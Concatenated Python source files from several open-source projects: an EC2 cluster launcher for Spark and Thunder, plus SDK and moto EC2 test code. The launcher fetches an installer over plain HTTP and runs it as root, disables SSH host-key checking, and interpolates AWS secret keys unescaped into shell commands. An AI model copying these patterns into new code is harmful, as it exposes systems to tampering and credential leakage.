ur""" Use this API to fetch filtered set of autoscalepolicy_nstimer_binding resources.
		Filter string should be in JSON format, e.g.: "port:80,servicetype:HTTP".
"""
try :
obj = autoscalepolicy_nstimer_binding()
obj.name = name
option_ = options()
option_.filter = filter_
response = obj.getfiltered(service, option_)
return response
except Exception as e:
raise e
@classmethod
def count(cls, service, name) :
ur""" Use this API to count autoscalepolicy_nstimer_binding resources configued on NetScaler.
"""
try :
obj = autoscalepolicy_nstimer_binding()
obj.name = name
option_ = options()
option_.count = True
response = obj.get_resources(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
@classmethod
def count_filtered(cls, service, name, filter_) :
ur""" Use this API to count the filtered set of autoscalepolicy_nstimer_binding resources.
		Filter string should be in JSON format, e.g.: "port:80,servicetype:HTTP".
"""
try :
obj = autoscalepolicy_nstimer_binding()
obj.name = name
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
class autoscalepolicy_nstimer_binding_response(base_response) :
def __init__(self, length=1) :
self.autoscalepolicy_nstimer_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.autoscalepolicy_nstimer_binding = [autoscalepolicy_nstimer_binding() for _ in range(length)]
|
benfinke/ns_python
|
nssrc/com/citrix/netscaler/nitro/resource/config/autoscale/autoscalepolicy_nstimer_binding.py
|
Python
|
apache-2.0
| 5,544
|
#!/usr/bin/env python
"""
Wrapper for the Spark EC2 launch script that additionally
installs Anaconda, Thunder, and its dependencies, and optionally
loads example data sets
"""
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Modified from Spark's spark_ec2.py under the terms of the ASF 2.0 license.
from boto import ec2
import sys
import os
import random
import subprocess
import time
from termcolor import colored
from distutils.version import LooseVersion
from sys import stderr
from optparse import OptionParser
from spark_ec2 import launch_cluster, get_existing_cluster, stringify_command,\
deploy_files, get_spark_ami, ssh_read, ssh_write
try:
from spark_ec2 import wait_for_cluster
except ImportError:
from spark_ec2 import wait_for_cluster_state
from thunder import __version__ as THUNDER_VERSION
MINIMUM_SPARK_VERSION = "1.1.0"
EXTRA_SSH_OPTS = ['-o', 'UserKnownHostsFile=/dev/null',
'-o', 'CheckHostIP=no',
'-o', 'LogLevel=quiet']
def print_status(msg):
print(" [" + msg + "]")
def print_success(msg="success"):
print(" [" + colored(msg, 'green') + "]")
def print_error(msg="failed"):
print(" [" + colored(msg, 'red') + "]")
class quiet(object):
""" Minmize stdout and stderr from external processes """
def __init__(self):
self.null_fds = [os.open(os.devnull, os.O_RDWR) for x in range(2)]
self.save_fds = (os.dup(1), os.dup(2))
def __enter__(self):
os.dup2(self.null_fds[0], 1)
os.dup2(self.null_fds[1], 2)
def __exit__(self, *_):
os.dup2(self.save_fds[0], 1)
os.dup2(self.save_fds[1], 2)
os.close(self.null_fds[0])
os.close(self.null_fds[1])
def get_s3_keys():
""" Get user S3 keys from environmental variables """
if os.getenv('S3_AWS_ACCESS_KEY_ID') is not None:
s3_access_key = os.getenv("S3_AWS_ACCESS_KEY_ID")
else:
s3_access_key = os.getenv("AWS_ACCESS_KEY_ID")
if os.getenv('S3_AWS_SECRET_ACCESS_KEY') is not None:
s3_secret_key = os.getenv("S3_AWS_SECRET_ACCESS_KEY")
else:
s3_secret_key = os.getenv("AWS_SECRET_ACCESS_KEY")
return s3_access_key, s3_secret_key
def get_default_thunder_version():
"""
Returns 'HEAD' (current state of thunder master branch) if thunder is a dev version, otherwise
return the current thunder version.
"""
if ".dev" in THUNDER_VERSION:
return 'HEAD'
return THUNDER_VERSION
def get_spark_version_string(default_version):
"""
Parses out the Spark version string from $SPARK_HOME/RELEASE, if present, or from pom.xml if not
Returns version string from either of the above sources, or default_version if nothing else works
"""
SPARK_HOME = os.getenv("SPARK_HOME")
if SPARK_HOME is None:
raise Exception('must assign the environmental variable SPARK_HOME with the location of Spark')
if os.path.isfile(os.path.join(SPARK_HOME, "RELEASE")):
with open(os.path.join(SPARK_HOME, "RELEASE")) as f:
line = f.read()
# some nasty ad-hoc parsing here. we expect a string of the form
# "Spark VERSION built for hadoop HADOOP_VERSION"
# where VERSION is a dotted version string.
# for now, simply check that there are at least two tokens and the second token contains a period.
tokens = line.split()
if len(tokens) >= 2 and '.' in tokens[1]:
return tokens[1]
# if we get to this point, we've failed to parse out a version string from the RELEASE file. note that
# there will not be a RELEASE file for versions of Spark built from source. in this case we'll try to
# get it out from the pom file.
import xml.etree.ElementTree as ET
try:
root = ET.parse(os.path.join(SPARK_HOME, "pom.xml"))
version_elt = root.find("./{http://maven.apache.org/POM/4.0.0}version")
if version_elt is not None:
return version_elt.text
except IOError:
# no pom file; fall through and return default
pass
return default_version
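# Example (illustrative only): a $SPARK_HOME/RELEASE file containing
# "Spark 1.2.0 built for Hadoop 2.4.0" yields "1.2.0"; if neither RELEASE nor
# pom.xml yields a version, the supplied default_version is returned unchanged.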
SPARK_VERSIONS_TO_HASHES = {
'1.2.0rc2': "a428c446e23e"
}
def setup_spark_cluster(master, opts):
ssh(master, opts, "chmod u+x spark-ec2/setup.sh")
ssh(master, opts, "spark-ec2/setup.sh")
def remap_spark_version_to_hash(user_version_string):
"""
Replaces a user-specified Spark version string with a github hash if needed.
Used to allow clusters to be deployed with Spark release candidates.
"""
return SPARK_VERSIONS_TO_HASHES.get(user_version_string, user_version_string)
def install_anaconda(master, opts):
""" Install Anaconda on a Spark EC2 cluster """
# download anaconda
print_status("Downloading Anaconda")
ssh(master, opts, "wget http://09c8d0b2229f813c1b93-c95ac804525aac4b6dba79b00b39d1d3.r79.cf1.rackcdn.com/"
"Anaconda-2.1.0-Linux-x86_64.sh")
print_success()
# setup anaconda
print_status("Installing Anaconda")
ssh(master, opts, "rm -rf /root/anaconda && bash Anaconda-2.1.0-Linux-x86_64.sh -b "
"&& rm Anaconda-2.1.0-Linux-x86_64.sh")
ssh(master, opts, "echo 'export PATH=/root/anaconda/bin:$PATH:/root/spark/bin' >> /root/.bash_profile")
ssh(master, opts, "pssh -h /root/spark-ec2/slaves 'echo 'export "
"PATH=/root/anaconda/bin:$PATH:/root/spark/bin' >> /root/.bash_profile'")
ssh(master, opts, "echo 'export PYSPARK_PYTHON=/root/anaconda/bin/python' >> /root/.bash_profile")
ssh(master, opts, "pssh -h /root/spark-ec2/slaves 'echo 'export "
"PYSPARK_PYTHON=/root/anaconda/bin/python' >> /root/.bash_profile'")
print_success()
# update core libraries
print_status("Updating Anaconda libraries")
ssh(master, opts, "/root/anaconda/bin/conda update --yes numpy scipy ipython")
ssh(master, opts, "/root/anaconda/bin/conda install --yes jsonschema pillow seaborn scikit-learn")
print_success()
# add mistune (for notebook conversions)
ssh(master, opts, "source ~/.bash_profile && pip install mistune")
# copy to slaves
print_status("Copying Anaconda to workers")
ssh(master, opts, "/root/spark-ec2/copy-dir /root/anaconda")
print_success()
def install_thunder(master, opts):
""" Install Thunder and dependencies on a Spark EC2 cluster """
print_status("Installing Thunder")
# download thunder
ssh(master, opts, "rm -rf thunder && git clone https://github.com/freeman-lab/thunder.git")
if opts.thunder_version.lower() != "head":
tagOrHash = opts.thunder_version
if '.' in tagOrHash and not (tagOrHash.startswith('v')):
# we have something that looks like a version number. prepend 'v' to get a valid tag id.
tagOrHash = 'v' + tagOrHash
ssh(master, opts, "cd thunder && git checkout %s" % tagOrHash)
# copy local data examples to all workers
ssh(master, opts, "yum install -y pssh")
ssh(master, opts, "pssh -h /root/spark-ec2/slaves mkdir -p /root/thunder/thunder/utils/data/")
ssh(master, opts, "~/spark-ec2/copy-dir /root/thunder/thunder/utils/data/")
# install requirements
ssh(master, opts, "source ~/.bash_profile && pip install -r /root/thunder/requirements.txt")
ssh(master, opts, "pssh -h /root/spark-ec2/slaves 'source ~/.bash_profile && pip install zope.cachedescriptors'")
# set environmental variables
ssh(master, opts, "echo 'export SPARK_HOME=/root/spark' >> /root/.bash_profile")
ssh(master, opts, "echo 'export PYTHONPATH=/root/thunder' >> /root/.bash_profile")
ssh(master, opts, "echo 'export IPYTHON=1' >> /root/.bash_profile")
# build thunder
ssh(master, opts, "chmod u+x thunder/bin/build")
ssh(master, opts, "source ~/.bash_profile && thunder/bin/build")
ssh(master, opts, "echo 'export PATH=/root/thunder/bin:$PATH' >> /root/.bash_profile")
# add AWS credentials to ~/.boto
access, secret = get_s3_keys()
credentialstring = "[Credentials]\naws_access_key_id = ACCESS\naws_secret_access_key = SECRET\n"
credentialsfilled = credentialstring.replace('ACCESS', access).replace('SECRET', secret)
ssh(master, opts, "printf '"+credentialsfilled+"' > /root/.boto")
ssh(master, opts, "printf '[s3]\ncalling_format = boto.s3.connection.OrdinaryCallingFormat' >> /root/.boto")
ssh(master, opts, "pscp.pssh -h /root/spark-ec2/slaves /root/.boto /root/.boto")
print_success()
def configure_spark(master, opts):
""" Configure Spark with useful settings for running Thunder """
print_status("Configuring Spark for Thunder")
# customize spark configuration parameters
ssh(master, opts, "echo 'spark.akka.frameSize=2047' >> /root/spark/conf/spark-defaults.conf")
ssh(master, opts, "echo 'spark.kryoserializer.buffer.max.mb=1024' >> /root/spark/conf/spark-defaults.conf")
ssh(master, opts, "echo 'spark.driver.maxResultSize=0' >> /root/spark/conf/spark-defaults.conf")
ssh(master, opts, "echo 'export SPARK_DRIVER_MEMORY=20g' >> /root/spark/conf/spark-env.sh")
ssh(master, opts, "sed 's/log4j.rootCategory=INFO/log4j.rootCategory=ERROR/g' "
"/root/spark/conf/log4j.properties.template > /root/spark/conf/log4j.properties")
# point spark to the anaconda python
ssh(master, opts, "echo 'export PYSPARK_DRIVER_PYTHON=/root/anaconda/bin/python' >> "
"/root/spark/conf/spark-env.sh")
ssh(master, opts, "echo 'export PYSPARK_PYTHON=/root/anaconda/bin/python' >> "
"/root/spark/conf/spark-env.sh")
ssh(master, opts, "/root/spark-ec2/copy-dir /root/spark/conf")
# add AWS credentials to core-site.xml
configstring = "<property><name>fs.s3n.awsAccessKeyId</name><value>ACCESS</value></property><property>" \
"<name>fs.s3n.awsSecretAccessKey</name><value>SECRET</value></property>"
access, secret = get_s3_keys()
filled = configstring.replace('ACCESS', access).replace('SECRET', secret)
ssh(master, opts, "sed -i'f' 's,.*</configuration>.*,"+filled+"&,' /root/ephemeral-hdfs/conf/core-site.xml")
ssh(master, opts, "sed -i'f' 's,.*</configuration>.*,"+filled+"&,' /root/spark/conf/core-site.xml")
# configure requester pays
ssh(master, opts, "touch /root/spark/conf/jets3t.properties")
ssh(master, opts, "echo 'httpclient.requester-pays-buckets-enabled = true' >> /root/spark/conf/jets3t.properties")
ssh(master, opts, "~/spark-ec2/copy-dir /root/spark/conf")
print_success()
# This is a customized version of the spark_ec2 ssh() function that
# adds additional options to squash ssh host key checking errors that
# occur when the ip addresses of your ec2 nodes change when you
# start/stop a cluster. Lame to have to copy all this code over, but
# this seemed the simplest way to add this necessary functionality.
def ssh_args(opts):
parts = ['-o', 'StrictHostKeyChecking=no'] + EXTRA_SSH_OPTS
# Never store EC2 IPs in known hosts...
if opts.identity_file is not None:
parts += ['-i', opts.identity_file]
return parts
def ssh_command(opts):
return ['ssh'] + ssh_args(opts)
def ssh(host, opts, command):
tries = 0
cmd = ssh_command(opts) + ['-t', '-t', '%s@%s' % (opts.user, host), stringify_command(command)]
while True:
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout = process.communicate()[0]
code = process.returncode
if code != 0:
if tries > 2:
print_error("SSH failure, returning error")
raise Exception(stdout)
else:
time.sleep(3)
tries += 1
else:
return
def setup_cluster(conn, master_nodes, slave_nodes, opts, deploy_ssh_key):
"""
Modified version of the setup_cluster function (borrowed from spark-ec.py)
in order to manually set the folder with the deploy code
"""
master = master_nodes[0].public_dns_name
if deploy_ssh_key:
print_status("Generating cluster's SSH key on master")
key_setup = """
[ -f ~/.ssh/id_rsa ] ||
(ssh-keygen -q -t rsa -N '' -f ~/.ssh/id_rsa &&
cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys)
"""
ssh(master, opts, key_setup)
print_success()
with quiet():
dot_ssh_tar = ssh_read(master, opts, ['tar', 'c', '.ssh'])
print_status("Transferring cluster's SSH key to slaves")
with quiet():
for slave in slave_nodes:
ssh_write(slave.public_dns_name, opts, ['tar', 'x'], dot_ssh_tar)
print_success()
modules = ['spark', 'shark', 'ephemeral-hdfs', 'persistent-hdfs',
'mapreduce', 'spark-standalone', 'tachyon']
if opts.hadoop_major_version == "1":
modules = filter(lambda x: x != "mapreduce", modules)
if opts.ganglia:
modules.append('ganglia')
if spark_home_loose_version >= LooseVersion("1.3.0"):
MESOS_SPARK_EC2_BRANCH = "branch-1.3"
ssh(master, opts, "rm -rf spark-ec2 && git clone https://github.com/mesos/spark-ec2.git "
"-b {b}".format(b=MESOS_SPARK_EC2_BRANCH))
else:
ssh(master, opts, "rm -rf spark-ec2 && git clone https://github.com/mesos/spark-ec2.git "
"-b v4")
print_status("Deploying files to master")
deploy_folder = os.path.join(os.environ['SPARK_HOME'], "ec2", "deploy.generic")
with quiet():
deploy_files(conn, deploy_folder, opts, master_nodes, slave_nodes, modules)
print_success()
print_status("Installing Spark (may take several minutes)")
setup_spark_cluster(master, opts)
print_success()
if __name__ == "__main__":
spark_home_version_string = get_spark_version_string(MINIMUM_SPARK_VERSION)
spark_home_loose_version = LooseVersion(spark_home_version_string)
parser = OptionParser(usage="thunder-ec2 [options] <action> <clustername>", add_help_option=False)
parser.add_option("-h", "--help", action="help", help="Show this help message and exit")
parser.add_option("-k", "--key-pair", help="Key pair to use on instances")
parser.add_option("-s", "--slaves", type="int", default=1, help="Number of slaves to launch (default: 1)")
parser.add_option("-i", "--identity-file", help="SSH private key file to use for logging into instances")
parser.add_option("-r", "--region", default="us-east-1", help="EC2 region zone to launch instances "
"in (default: us-east-1)")
parser.add_option("-t", "--instance-type", default="m3.2xlarge",
help="Type of instance to launch (default: m3.2xlarge)." +
" WARNING: must be 64-bit; small instances won't work")
parser.add_option(
"-m", "--master-instance-type", default="",
help="Master instance type (leave empty for same as instance-type)")
parser.add_option("-u", "--user", default="root", help="User name for cluster (default: root)")
parser.add_option("-v", "--spark-version", default=spark_home_version_string,
help="Version of Spark to use: 'X.Y.Z' or a specific git hash. (default: %s)" %
spark_home_version_string)
parser.add_option("--thunder-version", default=get_default_thunder_version(),
help="Version of Thunder to use: 'X.Y.Z', 'HEAD' (current state of master branch), " +
" or a specific git hash. (default: '%default')")
if spark_home_loose_version >= LooseVersion("1.2.0"):
parser.add_option(
"-w", "--wait", type="int", default=160,
help="DEPRECATED (no longer necessary for Spark >= 1.2.0) - Seconds to wait for nodes to start")
else:
parser.add_option("-w", "--wait", type="int", default=160,
help="Seconds to wait for nodes to start (default: 160)")
parser.add_option("-z", "--zone", default="", help="Availability zone to launch instances in, or 'all' to spread "
"slaves across multiple (an additional $0.01/Gb for "
"bandwidth between zones applies)")
parser.add_option(
"--spark-git-repo",
default="https://github.com/apache/spark",
help="Github repo from which to checkout supplied commit hash")
parser.add_option(
"--hadoop-major-version", default="1",
help="Major version of Hadoop (default: %default)")
parser.add_option("--ssh-port-forwarding", default=None,
help="Set up ssh port forwarding when you login to the cluster. " +
"This provides a convenient alternative to connecting to iPython " +
"notebook over an open port using SSL. You must supply an argument " +
"of the form \"local_port:remote_port\".")
parser.add_option(
"--ebs-vol-size", metavar="SIZE", type="int", default=0,
help="Size (in GB) of each EBS volume.")
parser.add_option(
"--ebs-vol-type", default="standard",
help="EBS volume type (e.g. 'gp2', 'standard').")
parser.add_option(
"--ebs-vol-num", type="int", default=1,
help="Number of EBS volumes to attach to each node as /vol[x]. " +
"The volumes will be deleted when the instances terminate. " +
"Only possible on EBS-backed AMIs. " +
"EBS volumes are only attached if --ebs-vol-size > 0." +
"Only support up to 8 EBS volumes.")
parser.add_option(
"--swap", metavar="SWAP", type="int", default=1024,
help="Swap space to set up per node, in MB (default: %default)")
parser.add_option("--spot-price", metavar="PRICE", type="float",
help="If specified, launch slaves as spot instances with the given " +
"maximum price (in dollars)")
parser.add_option(
"--ganglia", action="store_true", default=True,
help="Setup Ganglia monitoring on cluster (default: %default). NOTE: " +
"the Ganglia page will be publicly accessible")
parser.add_option(
"--no-ganglia", action="store_false", dest="ganglia",
help="Disable Ganglia monitoring for the cluster")
parser.add_option("--resume", default=False, action="store_true",
help="Resume installation on a previously launched cluster (for debugging)")
parser.add_option(
"--worker-instances", type="int", default=1,
help="Number of instances per worker: variable SPARK_WORKER_INSTANCES (default: %default)")
parser.add_option("--master-opts", type="string", default="",
help="Extra options to give to master through SPARK_MASTER_OPTS variable " +
"(e.g -Dspark.worker.timeout=180)")
parser.add_option("--user-data", type="string", default="",
help="Path to a user-data file (most AMI's interpret this as an initialization script)")
if spark_home_loose_version >= LooseVersion("1.2.0"):
parser.add_option("--authorized-address", type="string", default="0.0.0.0/0",
help="Address to authorize on created security groups (default: %default)" +
" (only with Spark >= 1.2.0)")
parser.add_option("--additional-security-group", type="string", default="",
help="Additional security group to place the machines in (only with Spark >= 1.2.0)")
parser.add_option("--copy-aws-credentials", action="store_true", default=False,
help="Add AWS credentials to hadoop configuration to allow Spark to access S3" +
" (only with Spark >= 1.2.0)")
if spark_home_loose_version >= LooseVersion("1.3.0"):
parser.add_option("--subnet-id", default=None,
help="VPC subnet to launch instances in (only with Spark >= 1.3.0")
parser.add_option("--vpc-id", default=None,
help="VPC to launch instances in (only with Spark >= 1.3.0)")
parser.add_option("--placement-group", type="string", default=None,
help="Which placement group to try and launch instances into. Assumes placement "
"group is already created.")
parser.add_option("--spark-ec2-git-repo", default="https://github.com/mesos/spark-ec2",
help="Github repo from which to checkout spark-ec2 (default: %default)")
parser.add_option("--spark-ec2-git-branch", default="branch-1.3",
help="Github repo branch of spark-ec2 to use (default: %default)")
parser.add_option("--private-ips", action="store_true", default=False,
help="Use private IPs for instances rather than public if VPC/subnet " +
"requires that.")
(opts, args) = parser.parse_args()
if len(args) != 2:
parser.print_help()
sys.exit(1)
(action, cluster_name) = args
spark_version_string = opts.spark_version
# check that requested spark version is <= the $SPARK_HOME version, or is a github hash
if '.' in spark_version_string:
# version string is dotted, not a hash
spark_cluster_loose_version = LooseVersion(spark_version_string)
if spark_cluster_loose_version > spark_home_loose_version:
raise ValueError("Requested cluster Spark version '%s' is greater " % spark_version_string
+ "than the local version of Spark in $SPARK_HOME, '%s'" % spark_home_version_string)
if spark_cluster_loose_version < LooseVersion(MINIMUM_SPARK_VERSION):
raise ValueError("Requested cluster Spark version '%s' is less " % spark_version_string
+ "than the minimum version required for Thunder, '%s'" % MINIMUM_SPARK_VERSION)
    opts.ami = get_spark_ami(opts)  # "ami-3ecd0c56"
# get version string as github commit hash if needed (mainly to support Spark release candidates)
opts.spark_version = remap_spark_version_to_hash(spark_version_string)
# Launch a cluster, setting several options to defaults
# (use spark-ec2.py included with Spark for more control)
if action == "launch":
try:
conn = ec2.connect_to_region(opts.region)
except Exception as e:
print >> stderr, (e)
sys.exit(1)
if opts.zone == "":
opts.zone = random.choice(conn.get_all_zones()).name
if opts.resume:
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
else:
(master_nodes, slave_nodes) = launch_cluster(conn, opts, cluster_name)
try:
wait_for_cluster(conn, opts.wait, master_nodes, slave_nodes)
except NameError:
if spark_home_loose_version >= LooseVersion("1.3.0"):
wait_for_cluster_state(cluster_instances=(master_nodes + slave_nodes),
cluster_state='ssh-ready', opts=opts, conn=conn)
else:
wait_for_cluster_state(cluster_instances=(master_nodes + slave_nodes),
cluster_state='ssh-ready', opts=opts)
print("")
setup_cluster(conn, master_nodes, slave_nodes, opts, True)
master = master_nodes[0].public_dns_name
install_anaconda(master, opts)
install_thunder(master, opts)
configure_spark(master, opts)
print("")
print("Cluster successfully launched!")
print("")
print("Go to " + colored("http://%s:8080" % master, 'blue') + " to see the web UI for your cluster")
if opts.ganglia:
print("Go to " + colored("http://%s:5080/ganglia" % master, 'blue') + " to view ganglia monitor")
print("")
if action != "launch":
conn = ec2.connect_to_region(opts.region)
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
master = master_nodes[0].public_dns_name
# Login to the cluster
if action == "login":
print "Logging into master " + master + "..."
proxy_opt = []
# SSH tunnels are a convenient, zero-configuration
# alternative to opening a port using the EC2 security
# group settings and using iPython notebook over SSL.
#
# If the user has requested ssh port forwarding, we set
# that up here.
if opts.ssh_port_forwarding is not None:
ssh_ports = opts.ssh_port_forwarding.split(":")
if len(ssh_ports) != 2:
print "\nERROR: Could not parse arguments to \'--ssh-port-forwarding\'."
print " Be sure you use the syntax \'local_port:remote_port\'"
sys.exit(1)
print ("\nSSH port forwarding requested. Remote port " + ssh_ports[1] +
" will be accessible at http://localhost:" + ssh_ports[0] + '\n')
try:
subprocess.check_call(ssh_command(opts) + proxy_opt + EXTRA_SSH_OPTS +
['-L', ssh_ports[0] +
':127.0.0.1:' + ssh_ports[1],
'-o', 'ExitOnForwardFailure=yes',
'-t', '-t', "%s@%s" % (opts.user, master)])
except subprocess.CalledProcessError:
print "\nERROR: Could not establish ssh connection with port forwarding."
print " Check your Internet connection and make sure that the"
print " ports you have requested are not already in use."
sys.exit(1)
else:
subprocess.check_call(ssh_command(opts) + proxy_opt + EXTRA_SSH_OPTS +
['-t', '-t',
"%s@%s" % (opts.user, master)])
elif action == "reboot-slaves":
response = raw_input(
"Are you sure you want to reboot the cluster " +
cluster_name + " slaves?\n" +
"Reboot cluster slaves " + cluster_name + " (y/N): ")
if response == "y":
(master_nodes, slave_nodes) = get_existing_cluster(
conn, opts, cluster_name, die_on_error=False)
print "Rebooting slaves..."
for inst in slave_nodes:
if inst.state not in ["shutting-down", "terminated"]:
print "Rebooting " + inst.id
inst.reboot()
elif action == "get-master":
print master_nodes[0].public_dns_name
# Install thunder on the cluster
elif action == "install":
#install_anaconda(master, opts)
install_thunder(master, opts)
configure_spark(master, opts)
# Stop a running cluster. Storage on EBS volumes is
# preserved, so you can restart the cluster in the same state
# (though you do pay a modest fee for EBS storage in the
# meantime).
elif action == "stop":
response = raw_input(
"Are you sure you want to stop the cluster " +
cluster_name + "?\nDATA ON EPHEMERAL DISKS WILL BE LOST, " +
"BUT THE CLUSTER WILL KEEP USING SPACE ON\n" +
"AMAZON EBS IF IT IS EBS-BACKED!!\n" +
"All data on spot-instance slaves will be lost.\n" +
"Stop cluster " + cluster_name + " (y/N): ")
if response == "y":
(master_nodes, slave_nodes) = get_existing_cluster(
conn, opts, cluster_name, die_on_error=False)
print "Stopping master..."
for inst in master_nodes:
if inst.state not in ["shutting-down", "terminated"]:
inst.stop()
print "Stopping slaves..."
for inst in slave_nodes:
if inst.state not in ["shutting-down", "terminated"]:
if inst.spot_instance_request_id:
inst.terminate()
else:
inst.stop()
# Restart a stopped cluster
elif action == "start":
print "Starting slaves..."
for inst in slave_nodes:
if inst.state not in ["shutting-down", "terminated"]:
inst.start()
print "Starting master..."
for inst in master_nodes:
if inst.state not in ["shutting-down", "terminated"]:
inst.start()
try:
wait_for_cluster(conn, opts.wait, master_nodes, slave_nodes)
except NameError:
if spark_home_loose_version >= LooseVersion("1.3.0"):
wait_for_cluster_state(cluster_instances=(master_nodes + slave_nodes),
cluster_state='ssh-ready', opts=opts, conn=conn)
else:
wait_for_cluster_state(cluster_instances=(master_nodes + slave_nodes),
cluster_state='ssh-ready', opts=opts)
print("")
setup_cluster(conn, master_nodes, slave_nodes, opts, False)
master = master_nodes[0].public_dns_name
configure_spark(master, opts)
print("")
print("Cluster successfully restarted!")
print("Go to " + colored("http://%s:8080" % master, 'blue') + " to see the web UI for your cluster")
print("")
# Destroy the cluster
elif action == "destroy":
response = raw_input("Are you sure you want to destroy the cluster " + cluster_name +
"?\nALL DATA ON ALL NODES WILL BE LOST!!\n" +
"Destroy cluster " + cluster_name + " (y/N): ")
if response == "y":
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name, die_on_error=False)
print "Terminating master..."
for inst in master_nodes:
inst.terminate()
print "Terminating slaves..."
for inst in slave_nodes:
inst.terminate()
else:
raise NotImplementedError("action: " + action + "not recognized")
|
zhwa/thunder
|
thunder/utils/ec2.py
|
Python
|
apache-2.0
| 31,603
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
class TestSample(unittest.TestCase):
SAMPLE_RATE = 16000
AUDIO_SOURCE_URI = 'gs://sample-bucket/sample-recording.flac'
@staticmethod
def _get_target_class():
from google.cloud.speech.sample import Sample
return Sample
def _make_one(self, *args, **kw):
return self._get_target_class()(*args, **kw)
def test_initialize_sample(self):
from google.cloud.speech.encoding import Encoding
sample = self._make_one(source_uri=self.AUDIO_SOURCE_URI,
encoding=Encoding.FLAC,
sample_rate=self.SAMPLE_RATE)
self.assertEqual(sample.source_uri, self.AUDIO_SOURCE_URI)
self.assertEqual(sample.encoding, Encoding.FLAC)
self.assertEqual(sample.sample_rate, self.SAMPLE_RATE)
def test_content_and_source_uri(self):
with self.assertRaises(ValueError):
self._make_one(content='awefawagaeragere',
source_uri=self.AUDIO_SOURCE_URI)
def test_sample_rates(self):
from google.cloud.speech.encoding import Encoding
with self.assertRaises(ValueError):
self._make_one(source_uri=self.AUDIO_SOURCE_URI,
sample_rate=7999)
with self.assertRaises(ValueError):
self._make_one(source_uri=self.AUDIO_SOURCE_URI,
sample_rate=48001)
sample = self._make_one(source_uri=self.AUDIO_SOURCE_URI,
sample_rate=self.SAMPLE_RATE,
encoding=Encoding.FLAC)
self.assertEqual(sample.sample_rate, self.SAMPLE_RATE)
self.assertEqual(sample.encoding, Encoding.FLAC)
sample = self._make_one(source_uri=self.AUDIO_SOURCE_URI,
encoding=Encoding.FLAC)
self.assertEqual(sample.sample_rate, self.SAMPLE_RATE)
def test_encoding(self):
from google.cloud.speech.encoding import Encoding
with self.assertRaises(ValueError):
self._make_one(source_uri=self.AUDIO_SOURCE_URI,
sample_rate=self.SAMPLE_RATE,
encoding='OGG')
with self.assertRaises(ValueError):
self._make_one(source_uri=self.AUDIO_SOURCE_URI,
sample_rate=self.SAMPLE_RATE)
sample = self._make_one(source_uri=self.AUDIO_SOURCE_URI,
sample_rate=self.SAMPLE_RATE,
encoding=Encoding.FLAC)
self.assertEqual(sample.encoding, Encoding.FLAC)
|
quom/google-cloud-python
|
speech/unit_tests/test_sample.py
|
Python
|
apache-2.0
| 3,192
|
from __future__ import unicode_literals
# Ensure 'assert_raises' context manager support for Python 2.6
import tests.backport_assert_raises
from nose.tools import assert_raises
from moto.ec2 import ec2_backends
import boto
from boto.exception import EC2ResponseError
import sure # noqa
from moto import mock_ec2
@mock_ec2
def test_create_and_delete_volume():
conn = boto.connect_ec2('the_key', 'the_secret')
volume = conn.create_volume(80, "us-east-1a")
all_volumes = conn.get_all_volumes()
all_volumes.should.have.length_of(1)
all_volumes[0].size.should.equal(80)
all_volumes[0].zone.should.equal("us-east-1a")
volume = all_volumes[0]
volume.delete()
conn.get_all_volumes().should.have.length_of(0)
# Deleting something that was already deleted should throw an error
with assert_raises(EC2ResponseError) as cm:
volume.delete()
cm.exception.code.should.equal('InvalidVolume.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
@mock_ec2
def test_filter_volume_by_id():
conn = boto.connect_ec2('the_key', 'the_secret')
volume1 = conn.create_volume(80, "us-east-1a")
volume2 = conn.create_volume(36, "us-east-1b")
volume3 = conn.create_volume(20, "us-east-1c")
vol1 = conn.get_all_volumes(volume_ids=volume3.id)
vol1.should.have.length_of(1)
vol1[0].size.should.equal(20)
vol1[0].zone.should.equal('us-east-1c')
vol2 = conn.get_all_volumes(volume_ids=[volume1.id, volume2.id])
vol2.should.have.length_of(2)
@mock_ec2
def test_volume_filters():
conn = boto.connect_ec2('the_key', 'the_secret')
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
instance.update()
volume1 = conn.create_volume(80, "us-east-1a")
volume2 = conn.create_volume(36, "us-east-1b")
volume3 = conn.create_volume(20, "us-east-1c")
snapshot = volume3.create_snapshot(description='testsnap')
volume4 = conn.create_volume(25, "us-east-1a", snapshot=snapshot)
conn.create_tags([volume1.id], {'testkey1': 'testvalue1'})
conn.create_tags([volume2.id], {'testkey2': 'testvalue2'})
volume1.update()
volume2.update()
volume3.update()
volume4.update()
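    # run_instances() above provisions a root volume attached at /dev/sda1; its
    # attachment metadata is what the attachment.* filters below are matched against.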
block_mapping = instance.block_device_mapping['/dev/sda1']
volumes_by_attach_time = conn.get_all_volumes(filters={'attachment.attach-time': block_mapping.attach_time})
set([vol.id for vol in volumes_by_attach_time]).should.equal(set([block_mapping.volume_id]))
volumes_by_attach_device = conn.get_all_volumes(filters={'attachment.device': '/dev/sda1'})
set([vol.id for vol in volumes_by_attach_device]).should.equal(set([block_mapping.volume_id]))
